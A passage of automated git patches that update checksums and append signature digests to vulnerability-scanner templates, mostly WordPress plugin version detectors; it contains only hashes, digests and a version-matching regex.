1444/1841] Auto Generated Templates Checksum [Fri Jul 19 06:41:00 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index eddfdab11c..c9788d634c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2517,7 +2517,7 @@ http/cves/2021/CVE-2021-46422.yaml:0579fb33431d31ec41b9974a2d5b1dd65e6c2168 http/cves/2021/CVE-2021-46424.yaml:1da936f682827f6a5f3e72d327c1a4b86426e80d http/cves/2021/CVE-2021-46704.yaml:1f7d8ca83c8dcd4beb8ccd8f509c6c2a39390b08 http/cves/2022/CVE-2022-0087.yaml:ab30fa1e96d3eefebcff47dc05be32b1ef1d6467 -http/cves/2022/CVE-2022-0140.yaml:1df6fe2127b2d8ff6f801b6c7a87ce18c0dd12a7 +http/cves/2022/CVE-2022-0140.yaml:6554d40f8c7351954cd34b2ad57cb0cfcb90db46 http/cves/2022/CVE-2022-0147.yaml:d50f59648ef62408d211f30339418e1f73546638 http/cves/2022/CVE-2022-0148.yaml:6a2d16cdaa86368c72f3cebd570cf17b9b62884b http/cves/2022/CVE-2022-0149.yaml:af0215192be07e3b138588253c487d2d703af86f @@ -8901,7 +8901,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:26067eae85e1c1412c407243cbf81c4ec604cecb +templates-checksum.txt:80f06ced214f60b7d860d0808ef4c96bdf057aa4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 74a6bd2a00a3f0b95af163b4858eeb2ef50ad32b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 19 Jul 2024 06:41:19 +0000 Subject: [PATCH 1445/1841] Auto Template Signing [Fri Jul 19 06:41:19 UTC 2024] :robot: --- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 310a39e82a..24ce92954d 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efedfed019372fabd4ec462ca8128065b5c74513db3e9e565a9f74f45b7714c802206c5fe554f4a89a675c078661b0ad020fd9ccad466d1ecd821a5632bbc74749ba:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100caefdd51afe4f3aa16931b127e2249fc2d2f5560ca001b7c595244032e9759d30221008877efb014558dce1dd69ab7eda43bdd6545c84bf1fed10299ceba9cac58cad0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..58dbf0cadb 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ecd7fec4afacd83854864f9a41837f1c36c64b547c636b0c580e4ed083356485022100bff9ed9d7630df8d81bd255be1e9bbf28dcb155afe0388ab881b642bfcae06a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..b13beea434 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203857a42390b90b09aab1a61bbc36847ed155589665435d8be3ed974807e8d065022033fa688bb12a8a566089043d3fbc92d4457a38357408cfa4058070565de8add0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..caa4d88150 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210081a38715eff751b1b5b273bc6903fa6f63417da7bdc047b41007706a895e80e5022100afa3443b3c905252c47af8528999fe7528c2f31c2691ec0f59992950e28ecc86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..10cc58cb37 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff07b3f5b413cfc39c254d0224709c6567ac21a84fbae8d22a5a6e63fa9a728602207d1e3109ed9f149843c07eed167445fcaee83be906588e1af838414d9d3beb61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..fcf85e8506 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d06f2684848544d7557192ce9e64b7120fc21df98b91ae8c3c96c57cbaf9f2c202210092de17b7d340c57a54eb47c84d46060cfd6e64c66d9fd8cc9736be1de6c0a633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..72929b5626 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017331cb39ec15571651f46445a357a32dd5c0e811c5c0278dfef3b065675b69e0220515e3b35dabde78c6a8dac0a6cd5571949cca7f086b837dfe517005abacd436f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..2eafe535a2 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d18285e78b7ddd38fea5a95f1e337ea9de3912a8c06a63edd0f5f1db1bfd04a002202b02792c6784d0ee509445e59814e944da6069eb1d4f874ec5760361cc4d8dc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..bbb1de1f28 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd1235e93487fb03b27d75a499269ecc69931c4c17f124d4a11c2e90acabd60302206f5ef49382c80d18d29d630d0f288617ac6e12555c61e9bc4c35ba86660d22ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..9730d9f3be 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf36b1a2aa5eaf200120ea3bc0d3d7c5901c5df072097956367f9d1096e55377022100dd844f3984121a1613dc2cf50bd0f11d6861ebae624bfbe142cb9d706ecc7e9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..ac37df9716 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200206f382f732c520b458bdc632f31bc52df54ba9359e665802aa3c50a58f766d022100921579e252ee5fa6c5954694c713ad444288ae4a6ee880db23091a2418bb78ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..58bc5e4c82 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097c25a4ec20d3f0a530a5ff5a12f94e0f2289fea109cab152f28a0698350c112022100a3b3bfd1fc9c419a29f56982cd994b8759b373c3df43f3c20769e3c12ce5f417:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..3af674a951 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca39a5c30de75942a683b3a212e78bc04513bcb74ccecd51bacefaf3e3353039022074f9ee0d172ea19748d240b68fb5f917608088def017cdb44cad9eb4945329da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..7b0bb75d18 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220623fab18b2198c20ca5fff2a90c18d1aa4c910ae29775482c36f4122399b9bad022100a374971082cf13c79a3ab8a969e41dae330be806b5bcc19d57c85189c593a0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..e48731e3c4 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220213ece80d49f00bd6d2e444e49626f64019d84a41b4e60081aef3fd909907ae1022100ad8e2c2e71a6c604d94453953a22639e8d95e0c77db231b81344c283452a8254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..f8682b9b31 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2c230045a63af271846681b63fd21d985d31a9e50dfbafad88dd942b706bb1f022100e7802272ec856b141ce3b657f3e154d8dca219d01174a771ce67d7c9efd67df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..5df569e1c9 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c481d6b4d011ed42699f97a97f0550370817c0e798bb1325d890fc16b5a078a2022100933f9bdc0341f13ae6533a5ea58facf994e05659fcf72ab23d340033cfcb1ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..d89dcef0d0 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203443477f31743e9bfb5b98fbcb7bcd2cb062ee2a39889b18bb79b124eca96548022100c42a0633114e766e3fa65a7221e640d64d06ebde2767bcc4429c23f2e9cca687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..570af4f389 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3210ba36625264de407cd4ca180f98f6315c21f7dc23f40120913b311f3f3bb022100d5d9f77f225855f8104eb11d7f34146bd00df0b489aec9adaf3e55f3f74d4024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..98d689968d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec97cc375a38e1cafbb4f90d770c75aa056e1bcc16285b90d353440bde03a4cd022100feff98d398a4341412433f3fcd5e80f24331b953a15137cd7579a996d5cae5e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..bb993609c1 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022055cd30113fc9a006fa98f7f2ef4515060de510f1e11c137aa9a6f301e615f13402201726fbddf8786b76bb6b5a6616c261fac49927ca9a9b0c5a315d04ba45d160f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..8fe96bbd4c 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201b83d248294b4ae6701b758b90310276a295d90462708990e0c1a6f064b3feec022100857e5f9dc33100db878ebd851ac6b319326aaeba74622ec9d3a37a431c9f766d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..d4946c9344 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc0bd7b25a68dfcf741defc9adf3c4cb78b014a0fd075e09d02820e75ba9593c022100a6e0cd70d6c50ac609de8121bc601a88dc793540de6149bdbcee124e740a2b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..6735df1565 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 